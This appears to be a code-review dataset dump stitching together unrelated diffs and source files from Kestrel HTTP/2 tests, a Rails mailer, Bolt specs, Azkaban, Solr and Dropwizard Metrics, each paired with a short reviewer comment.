Assert.NotNull(exception);
}
[Theory]
[InlineData(true)]
[InlineData(false)]
public async Task MaxRequestBodySize_AppCanRaiseLimit(bool includeContentLength)
{
_connectionContext.ServiceContext.ServerOptions.Limits.MaxRequestBodySize = 10;
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "POST"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
if (includeContentLength)
{
headers.Concat(new[]
{
new KeyValuePair<string, string>(HeaderNames.ContentLength, "12"),
});
}
await InitializeConnectionAsync(async context =>
{
Assert.False(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
context.Features.Get<IHttpMaxRequestBodySizeFeature>().MaxRequestBodySize = 12;
var buffer = new byte[100];
var read = await context.Request.Body.ReadAsync(buffer, 0, buffer.Length);
Assert.Equal(12, read);
Assert.True(context.Features.Get<IHttpMaxRequestBodySizeFeature>().IsReadOnly);
});
await StartStreamAsync(1, headers, endStream: false);
await SendDataAsync(1, new byte[12].AsSpan(), endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ApplicationExeption_BeforeFirstWrite_Sends500()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(context =>
{
throw new Exception("App Faulted");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 55,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 0,
withFlags: (byte)Http2DataFrameFlags.END_STREAM,
withStreamId: 1);
Assert.Contains(TestApplicationErrorLogger.Messages, m => (m.Exception?.Message.Contains("App Faulted") ?? false) && m.LogLevel == LogLevel.Error);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(3, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("500", _decodedHeaders[HeaderNames.Status]);
Assert.Equal("0", _decodedHeaders[HeaderNames.ContentLength]);
}
[Fact]
public async Task ApplicationExeption_AfterFirstWrite_Resets()
{
var headers = new[]
{
new KeyValuePair<string, string>(HeaderNames.Method, "GET"),
new KeyValuePair<string, string>(HeaderNames.Path, "/"),
new KeyValuePair<string, string>(HeaderNames.Scheme, "http"),
};
await InitializeConnectionAsync(async context =>
{
await context.Response.WriteAsync("hello,");
throw new Exception("App Faulted");
});
await StartStreamAsync(1, headers, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 37,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 6,
withFlags: (byte)Http2DataFrameFlags.NONE,
withStreamId: 1);
await WaitForStreamErrorAsync(1, Http2ErrorCode.INTERNAL_ERROR, "App Faulted");
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
_hpackDecoder.Decode(headersFrame.HeadersPayload, endHeaders: false, handler: this);
Assert.Equal(2, _decodedHeaders.Count);
Assert.Contains("date", _decodedHeaders.Keys, StringComparer.OrdinalIgnoreCase);
Assert.Equal("200", _decodedHeaders[HeaderNames.Status]);
}
[Fact]
public async Task RST_STREAM_Received_AbortsStream()
{
await InitializeConnectionAsync(_waitForAbortApplication);
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_Received_AbortsStream_FlushedHeadersNotSent()
{
await InitializeConnectionAsync(_waitForAbortFlushingApplication);
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_Received_AbortsStream_FlushedDataNotSent()
{
await InitializeConnectionAsync(_waitForAbortWithDataApplication);
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_WaitingForRequestBody_RequestBodyThrows()
{
var sem = new SemaphoreSlim(0);
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
var readTask = context.Request.Body.ReadAsync(new byte[100], 0, 100).DefaultTimeout();
sem.Release();
await readTask;
_runningStreams[streamIdFeature.StreamId].TrySetException(new Exception("ReadAsync was expected to throw."));
}
catch (IOException) // Expected failure
{
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await sem.WaitAsync().DefaultTimeout();
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RST_STREAM_IncompleteRequest_RequestBodyThrows()
{
var sem = new SemaphoreSlim(0);
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
var read = await context.Request.Body.ReadAsync(new byte[100], 0, 100).DefaultTimeout();
var readTask = context.Request.Body.ReadAsync(new byte[100], 0, 100).DefaultTimeout();
sem.Release();
await readTask;
_runningStreams[streamIdFeature.StreamId].TrySetException(new Exception("ReadAsync was expected to throw."));
}
catch (IOException) // Expected failure
{
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await SendDataAsync(1, new byte[10], endStream: false);
await sem.WaitAsync().DefaultTimeout();
await SendRstStreamAsync(1);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RequestAbort_SendsRstStream()
{
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
context.RequestAborted.Register(() =>
{
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
});
context.Abort();
// Not sent
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
await _runningStreams[streamIdFeature.StreamId].Task;
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RequestAbort_AfterDataSent_SendsRstStream()
{
await InitializeConnectionAsync(async context =>
{
var streamIdFeature = context.Features.Get<IHttp2StreamIdFeature>();
try
{
context.RequestAborted.Register(() =>
{
lock (_abortedStreamIdsLock)
{
_abortedStreamIds.Add(streamIdFeature.StreamId);
}
_runningStreams[streamIdFeature.StreamId].TrySetResult(null);
});
await context.Response.Body.WriteAsync(new byte[10], 0, 10);
context.Abort();
// Not sent
await context.Response.Body.WriteAsync(new byte[11], 0, 11);
await _runningStreams[streamIdFeature.StreamId].Task;
}
catch (Exception ex)
{
_runningStreams[streamIdFeature.StreamId].TrySetException(ex);
}
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: true);
var headersFrame = await ExpectAsync(Http2FrameType.HEADERS,
withLength: 37,
withFlags: (byte)Http2HeadersFrameFlags.END_HEADERS,
withStreamId: 1);
await ExpectAsync(Http2FrameType.DATA,
withLength: 10,
withFlags: 0,
withStreamId: 1);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await WaitForAllStreamsAsync();
Assert.Contains(1, _abortedStreamIds);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
}
[Fact]
public async Task RequestAbort_ThrowsOperationCanceledExceptionFromSubsequentRequestBodyStreamRead()
{
OperationCanceledException thrownEx = null;
await InitializeConnectionAsync(async context =>
{
context.Abort();
var buffer = new byte[100];
var thrownExTask = Assert.ThrowsAnyAsync<OperationCanceledException>(() => context.Request.Body.ReadAsync(buffer, 0, buffer.Length));
Assert.True(thrownExTask.IsCompleted);
thrownEx = await thrownExTask;
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
Assert.NotNull(thrownEx);
Assert.IsType<ConnectionAbortedException>(thrownEx);
Assert.Equal(CoreStrings.ConnectionAbortedByApplication, thrownEx.Message);
}
[Fact]
public async Task RequestAbort_ThrowsOperationCanceledExceptionFromOngoingRequestBodyStreamRead()
{
OperationCanceledException thrownEx = null;
await InitializeConnectionAsync(async context =>
{
var buffer = new byte[100];
var thrownExTask = Assert.ThrowsAnyAsync<OperationCanceledException>(() => context.Request.Body.ReadAsync(buffer, 0, buffer.Length));
Assert.False(thrownExTask.IsCompleted);
context.Abort();
thrownEx = await thrownExTask.DefaultTimeout();
});
await StartStreamAsync(1, _browserRequestHeaders, endStream: false);
await WaitForStreamErrorAsync(expectedStreamId: 1, Http2ErrorCode.INTERNAL_ERROR, CoreStrings.ConnectionAbortedByApplication);
await StopConnectionAsync(expectedLastStreamId: 1, ignoreNonGoAwayFrames: false);
Assert.NotNull(thrownEx);
Assert.IsType<TaskCanceledException>(thrownEx);
Assert.Equal("The request was aborted", thrownEx.Message);
Assert.IsType<ConnectionAbortedException>(thrownEx.InnerException);
Assert.Equal(CoreStrings.ConnectionAbortedByApplication, thrownEx.InnerException.Message);
}
}
} | 1 | 16,364 | Stephen already fixed this one. Only the OverSize test is flaky now right? | aspnet-KestrelHttpServer | .cs |
@@ -0,0 +1,6 @@
+<%= @activity %>
+
+<%= t("mailer.proposal_link_text",
+ proposal_url: proposal_url(@proposal)) %>
+
+<%= t("mailer.footer", feedback_url: feedback_url) %> | 1 | 1 | 16,664 | if the `activity_mailer` has a layout, should we include the footer in that? Realize there may also be conflicts with work @rememberlenny is working on... | 18F-C2 | rb |
|
@@ -16,6 +16,12 @@ require 'ruby_smb'
ENV['RACK_ENV'] = 'test'
$LOAD_PATH.unshift File.join(__dir__, 'lib')
+# Disables internationalized strings, which shouldn't be needed for tests.
+# This gets around an issue where Puppet::Environment and GettextSetup in
+# r10k are fighting over the same text domain within the FastGettext domain.
+# https://github.com/voxpupuli/ra10ke/issues/39
+Puppet[:disable_i18n] = true
+
RSpec.shared_context 'reset puppet settings' do
after :each do
# reset puppet settings so that they can be initialized again | 1 | # frozen_string_literal: true
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
require 'bolt'
require 'bolt/logger'
require 'logging'
require 'net/ssh'
require 'rspec/logging_helper'
# Make sure puppet is required for the 'reset puppet settings' context
require 'puppet_pal'
# HACK: must be loaded prior to spec libs that implement stub to prevent
# RubySMB::Dcerpc::Request from shadowing 'stub' through BinData::DSLMixin::DSLFieldValidator
require 'ruby_smb'
ENV['RACK_ENV'] = 'test'
$LOAD_PATH.unshift File.join(__dir__, 'lib')
RSpec.shared_context 'reset puppet settings' do
after :each do
# reset puppet settings so that they can be initialized again
Puppet.settings.instance_exec do
clear_everything_for_tests
end
end
end
RSpec.configure do |config|
Bolt::Logger.initialize_logging
include RSpec::LoggingHelper
config.capture_log_messages
# rspec-expectations config
config.expect_with :rspec do |expectations|
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
expectations.max_formatted_output_length = 500
end
config.filter_run_excluding windows_agents: true unless ENV['WINDOWS_AGENTS']
config.filter_run_excluding windows: true unless ENV['BOLT_WINDOWS']
config.filter_run_excluding sudo: true unless ENV['BOLT_SUDO_USER']
# rspec-mocks config
config.mock_with :rspec do |mocks|
# Prevents you from mocking or stubbing a method that does not exist on
# a real object.
mocks.verify_partial_doubles = true
end
config.before :each do
# Disable analytics while running tests
ENV['BOLT_DISABLE_ANALYTICS'] = 'true'
# Ignore local project.yaml files
allow(Bolt::Project).to receive(:new).and_call_original
allow(Bolt::Project).to receive(:new).with('.')
.and_return(Bolt::Project.new(Dir.mktmpdir))
# Ignore user's known hosts and ssh config files
conf = { user_known_hosts_file: '/dev/null/', global_known_hosts_file: '/dev/null' }
allow(Net::SSH::Config).to receive(:for).and_return(conf)
end
# This will be default in future rspec, leave it on
config.shared_context_metadata_behavior = :apply_to_host_groups
# Allows RSpec to persist some state between runs in order to support
# the `--only-failures` and `--next-failure` CLI options.
config.example_status_persistence_file_path = "spec/examples.txt"
# config.warnings = true
# Make it possible to include the 'reset puppet settings' shared context
# in a group (or even an individual test) by specifying
# `:reset_puppet_settings' metadata on the group/test
config.include_context 'reset puppet settings', :reset_puppet_settings
end
| 1 | 14,808 | This makes me nervous, mostly because I don't know very much about it. Will users run into the gettext error in the wild? I can't reproduce it locally, but it's hard to be 100% sure. Is disabling gettext in Pal an option? | puppetlabs-bolt | rb |
@@ -388,4 +388,10 @@ public class MockExecutorLoader implements ExecutorLoader {
public void unassignExecutor(int executionId) throws ExecutorManagerException {
executionExecutorMapping.remove(executionId);
}
+
+ @Override
+ public List<ExecutableFlow> fetchRecentlyFinishedFlows(long lifeTimeMs)
+ throws ExecutorManagerException {
+ return new ArrayList<>();
+ }
} | 1 | /*
* Copyright 2014 LinkedIn Corp.
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package azkaban.executor;
import java.io.File;
import java.util.ArrayList;
import java.util.Date;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import azkaban.executor.ExecutorLogEvent.EventType;
import azkaban.utils.FileIOUtils.LogData;
import azkaban.utils.Pair;
import azkaban.utils.Props;
public class MockExecutorLoader implements ExecutorLoader {
HashMap<Integer, Integer> executionExecutorMapping =
new HashMap<Integer, Integer>();
HashMap<Integer, ExecutableFlow> flows =
new HashMap<Integer, ExecutableFlow>();
HashMap<String, ExecutableNode> nodes = new HashMap<String, ExecutableNode>();
HashMap<Integer, ExecutionReference> refs =
new HashMap<Integer, ExecutionReference>();
int flowUpdateCount = 0;
HashMap<String, Integer> jobUpdateCount = new HashMap<String, Integer>();
Map<Integer, Pair<ExecutionReference, ExecutableFlow>> activeFlows =
new HashMap<Integer, Pair<ExecutionReference, ExecutableFlow>>();
List<Executor> executors = new ArrayList<Executor>();
int executorIdCounter = 0;
Map<Integer, ArrayList<ExecutorLogEvent>> executorEvents =
new HashMap<Integer, ArrayList<ExecutorLogEvent>>();
@Override
public void uploadExecutableFlow(ExecutableFlow flow)
throws ExecutorManagerException {
flows.put(flow.getExecutionId(), flow);
flowUpdateCount++;
}
@Override
public ExecutableFlow fetchExecutableFlow(int execId)
throws ExecutorManagerException {
ExecutableFlow flow = flows.get(execId);
return ExecutableFlow.createExecutableFlowFromObject(flow.toObject());
}
@Override
public Map<Integer, Pair<ExecutionReference, ExecutableFlow>> fetchActiveFlows()
throws ExecutorManagerException {
return activeFlows;
}
@Override
public Pair<ExecutionReference, ExecutableFlow> fetchActiveFlowByExecId(int execId)
throws ExecutorManagerException {
return activeFlows.get(execId);
}
@Override
public List<ExecutableFlow> fetchFlowHistory(int projectId, String flowId,
int skip, int num) throws ExecutorManagerException {
return null;
}
@Override
public void addActiveExecutableReference(ExecutionReference ref)
throws ExecutorManagerException {
refs.put(ref.getExecId(), ref);
}
@Override
public void removeActiveExecutableReference(int execId)
throws ExecutorManagerException {
refs.remove(execId);
}
public boolean hasActiveExecutableReference(int execId) {
return refs.containsKey(execId);
}
@Override
public void uploadLogFile(int execId, String name, int attempt, File... files)
throws ExecutorManagerException {
}
@Override
public void updateExecutableFlow(ExecutableFlow flow)
throws ExecutorManagerException {
ExecutableFlow toUpdate = flows.get(flow.getExecutionId());
toUpdate.applyUpdateObject((Map<String, Object>) flow.toUpdateObject(0));
flowUpdateCount++;
}
@Override
public void uploadExecutableNode(ExecutableNode node, Props inputParams)
throws ExecutorManagerException {
ExecutableNode exNode = new ExecutableNode();
exNode.fillExecutableFromMapObject(node.toObject());
nodes.put(node.getId(), exNode);
jobUpdateCount.put(node.getId(), 1);
}
@Override
public void updateExecutableNode(ExecutableNode node)
throws ExecutorManagerException {
ExecutableNode foundNode = nodes.get(node.getId());
foundNode.setEndTime(node.getEndTime());
foundNode.setStartTime(node.getStartTime());
foundNode.setStatus(node.getStatus());
foundNode.setUpdateTime(node.getUpdateTime());
Integer value = jobUpdateCount.get(node.getId());
if (value == null) {
throw new ExecutorManagerException("The node has not been uploaded");
} else {
jobUpdateCount.put(node.getId(), ++value);
}
flowUpdateCount++;
}
@Override
public int fetchNumExecutableFlows(int projectId, String flowId)
throws ExecutorManagerException {
return 0;
}
@Override
public int fetchNumExecutableFlows() throws ExecutorManagerException {
// TODO Auto-generated method stub
return 0;
}
public int getFlowUpdateCount() {
return flowUpdateCount;
}
public Integer getNodeUpdateCount(String jobId) {
return jobUpdateCount.get(jobId);
}
@Override
public ExecutableJobInfo fetchJobInfo(int execId, String jobId, int attempt)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public boolean updateExecutableReference(int execId, long updateTime)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return true;
}
@Override
public LogData fetchLogs(int execId, String name, int attempt, int startByte,
int endByte) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableFlow> fetchFlowHistory(int skip, int num)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableFlow> fetchFlowHistory(String projectContains,
String flowContains, String userNameContains, int status, long startData,
long endData, int skip, int num) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableJobInfo> fetchJobHistory(int projectId, String jobId,
int skip, int size) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public int fetchNumExecutableNodes(int projectId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return 0;
}
@Override
public Props fetchExecutionJobInputProps(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public Props fetchExecutionJobOutputProps(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public Pair<Props, Props> fetchExecutionJobProps(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<ExecutableJobInfo> fetchJobInfoAttempts(int execId, String jobId)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public int removeExecutionLogsByTime(long millis)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return 0;
}
@Override
public List<ExecutableFlow> fetchFlowHistory(int projectId, String flowId,
int skip, int num, Status status) throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public List<Object> fetchAttachments(int execId, String name, int attempt)
throws ExecutorManagerException {
// TODO Auto-generated method stub
return null;
}
@Override
public void uploadAttachmentFile(ExecutableNode node, File file)
throws ExecutorManagerException {
// TODO Auto-generated method stub
}
@Override
public List<Executor> fetchActiveExecutors() throws ExecutorManagerException {
List<Executor> activeExecutors = new ArrayList<Executor>();
for (Executor executor : executors) {
if (executor.isActive()) {
activeExecutors.add(executor);
}
}
return activeExecutors;
}
@Override
public Executor fetchExecutor(String host, int port)
throws ExecutorManagerException {
for (Executor executor : executors) {
if (executor.getHost().equals(host) && executor.getPort() == port) {
return executor;
}
}
return null;
}
@Override
public Executor fetchExecutor(int executorId) throws ExecutorManagerException {
for (Executor executor : executors) {
if (executor.getId() == executorId) {
return executor;
}
}
return null;
}
@Override
public Executor addExecutor(String host, int port)
throws ExecutorManagerException {
Executor executor = null;
if (fetchExecutor(host, port) == null) {
executorIdCounter++;
executor = new Executor(executorIdCounter, host, port, true);
executors.add(executor);
}
return executor;
}
@Override
public void removeExecutor(String host, int port) throws ExecutorManagerException {
Executor executor = fetchExecutor(host, port);
if (executor != null) {
executorIdCounter--;
executors.remove(executor);
}
}
@Override
public void postExecutorEvent(Executor executor, EventType type, String user,
String message) throws ExecutorManagerException {
ExecutorLogEvent event =
new ExecutorLogEvent(executor.getId(), user, new Date(), type, message);
if (!executorEvents.containsKey(executor.getId())) {
executorEvents.put(executor.getId(), new ArrayList<ExecutorLogEvent>());
}
executorEvents.get(executor.getId()).add(event);
}
@Override
public List<ExecutorLogEvent> getExecutorEvents(Executor executor, int num,
int skip) throws ExecutorManagerException {
if (!executorEvents.containsKey(executor.getId())) {
List<ExecutorLogEvent> events = executorEvents.get(executor.getId());
return events.subList(skip, Math.min(num + skip - 1, events.size() - 1));
}
return null;
}
@Override
public void updateExecutor(Executor executor) throws ExecutorManagerException {
Executor oldExecutor = fetchExecutor(executor.getId());
executors.remove(oldExecutor);
executors.add(executor);
}
@Override
public List<Executor> fetchAllExecutors() throws ExecutorManagerException {
return executors;
}
@Override
public void assignExecutor(int executorId, int execId)
throws ExecutorManagerException {
ExecutionReference ref = refs.get(execId);
ref.setExecutor(fetchExecutor(executorId));
executionExecutorMapping.put(execId, executorId);
}
@Override
public Executor fetchExecutorByExecutionId(int execId) throws ExecutorManagerException {
if (executionExecutorMapping.containsKey(execId)) {
return fetchExecutor(executionExecutorMapping.get(execId));
} else {
throw new ExecutorManagerException(
"Failed to find executor with execution : " + execId);
}
}
@Override
public List<Pair<ExecutionReference, ExecutableFlow>> fetchQueuedFlows()
throws ExecutorManagerException {
List<Pair<ExecutionReference, ExecutableFlow>> queuedFlows =
new ArrayList<Pair<ExecutionReference, ExecutableFlow>>();
for (int execId : refs.keySet()) {
if (!executionExecutorMapping.containsKey(execId)) {
queuedFlows.add(new Pair<ExecutionReference, ExecutableFlow>(refs
.get(execId), flows.get(execId)));
}
}
return queuedFlows;
}
@Override
public void unassignExecutor(int executionId) throws ExecutorManagerException {
executionExecutorMapping.remove(executionId);
}
}
| 1 | 13,212 | Is Java smart enough to know the generic type here? Never knew this. | azkaban-azkaban | java |
@@ -71,7 +71,7 @@ public class BackupRepositoryFactory {
PluginInfo repo = Objects.requireNonNull(backupRepoPluginByName.get(name),
"Could not find a backup repository with name " + name);
- BackupRepository result = loader.newInstance(repo.className, BackupRepository.class);
+ BackupRepository result = loader.newInstance(repo, BackupRepository.class);
result.init(repo.initArgs);
return result;
} | 1 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.core.backup.repository;
import java.lang.invoke.MethodHandles;
import java.util.HashMap;
import java.util.Map;
import java.util.Objects;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.SolrException.ErrorCode;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.core.PluginInfo;
import org.apache.solr.core.SolrResourceLoader;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
public class BackupRepositoryFactory {
private static final Logger log = LoggerFactory.getLogger(MethodHandles.lookup().lookupClass());
private final Map<String,PluginInfo> backupRepoPluginByName = new HashMap<>();
private PluginInfo defaultBackupRepoPlugin = null;
public BackupRepositoryFactory(PluginInfo[] backupRepoPlugins) {
if (backupRepoPlugins != null) {
for (int i = 0; i < backupRepoPlugins.length; i++) {
String name = backupRepoPlugins[i].name;
boolean isDefault = backupRepoPlugins[i].isDefault();
if (backupRepoPluginByName.containsKey(name)) {
throw new SolrException(ErrorCode.SERVER_ERROR, "Duplicate backup repository with name " + name);
}
if (isDefault) {
if (this.defaultBackupRepoPlugin != null) {
throw new SolrException(ErrorCode.SERVER_ERROR, "More than one backup repository is configured as default");
}
this.defaultBackupRepoPlugin = backupRepoPlugins[i];
}
backupRepoPluginByName.put(name, backupRepoPlugins[i]);
log.info("Added backup repository with configuration params {}", backupRepoPlugins[i]);
}
if (backupRepoPlugins.length == 1) {
this.defaultBackupRepoPlugin = backupRepoPlugins[0];
}
if (this.defaultBackupRepoPlugin != null) {
log.info("Default configuration for backup repository is with configuration params {}",
defaultBackupRepoPlugin);
}
}
}
public BackupRepository newInstance(SolrResourceLoader loader, String name) {
Objects.requireNonNull(loader);
Objects.requireNonNull(name);
PluginInfo repo = Objects.requireNonNull(backupRepoPluginByName.get(name),
"Could not find a backup repository with name " + name);
BackupRepository result = loader.newInstance(repo.className, BackupRepository.class);
result.init(repo.initArgs);
return result;
}
public BackupRepository newInstance(SolrResourceLoader loader) {
if (defaultBackupRepoPlugin != null) {
return newInstance(loader, defaultBackupRepoPlugin.name);
}
LocalFileSystemRepository repo = new LocalFileSystemRepository();
repo.init(new NamedList<>());
return repo;
}
}
| 1 | 31,650 | no thought given to reload | apache-lucene-solr | java |
@@ -291,8 +291,17 @@ public abstract class ScheduledReporter implements Closeable, Reporter {
return shutdownExecutorOnStop;
}
- protected Set<MetricAttribute> getDisabledMetricAttributes() {
- return disabledMetricAttributes;
+ /**
+ * Check if Attribute disabled to be logged
+ * @param attribute metric attribute
+ * @return True if attribute is configured to be disabled
+ */
+ protected boolean isMetricAttributeDisabled(MetricAttribute attribute) {
+ if(disabledMetricAttributes != null && disabledMetricAttributes.contains(attribute)) {
+ return true;
+ }
+
+ return false;
}
private String calculateRateUnit(TimeUnit unit) { | 1 | package com.codahale.metrics;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import java.io.Closeable;
import java.util.Collections;
import java.util.Locale;
import java.util.Set;
import java.util.SortedMap;
import java.util.concurrent.ExecutionException;
import java.util.concurrent.Executors;
import java.util.concurrent.ScheduledExecutorService;
import java.util.concurrent.ScheduledFuture;
import java.util.concurrent.ThreadFactory;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.TimeoutException;
import java.util.concurrent.atomic.AtomicInteger;
/**
* The abstract base class for all scheduled reporters (i.e., reporters which process a registry's
* metrics periodically).
*
* @see ConsoleReporter
* @see CsvReporter
* @see Slf4jReporter
*/
public abstract class ScheduledReporter implements Closeable, Reporter {
private static final Logger LOG = LoggerFactory.getLogger(ScheduledReporter.class);
/**
* A simple named thread factory.
*/
@SuppressWarnings("NullableProblems")
private static class NamedThreadFactory implements ThreadFactory {
private final ThreadGroup group;
private final AtomicInteger threadNumber = new AtomicInteger(1);
private final String namePrefix;
private NamedThreadFactory(String name) {
final SecurityManager s = System.getSecurityManager();
this.group = (s != null) ? s.getThreadGroup() : Thread.currentThread().getThreadGroup();
this.namePrefix = "metrics-" + name + "-thread-";
}
@Override
public Thread newThread(Runnable r) {
final Thread t = new Thread(group, r, namePrefix + threadNumber.getAndIncrement(), 0);
t.setDaemon(true);
if (t.getPriority() != Thread.NORM_PRIORITY) {
t.setPriority(Thread.NORM_PRIORITY);
}
return t;
}
}
private static final AtomicInteger FACTORY_ID = new AtomicInteger();
private final MetricRegistry registry;
private final ScheduledExecutorService executor;
private final boolean shutdownExecutorOnStop;
private final Set<MetricAttribute> disabledMetricAttributes;
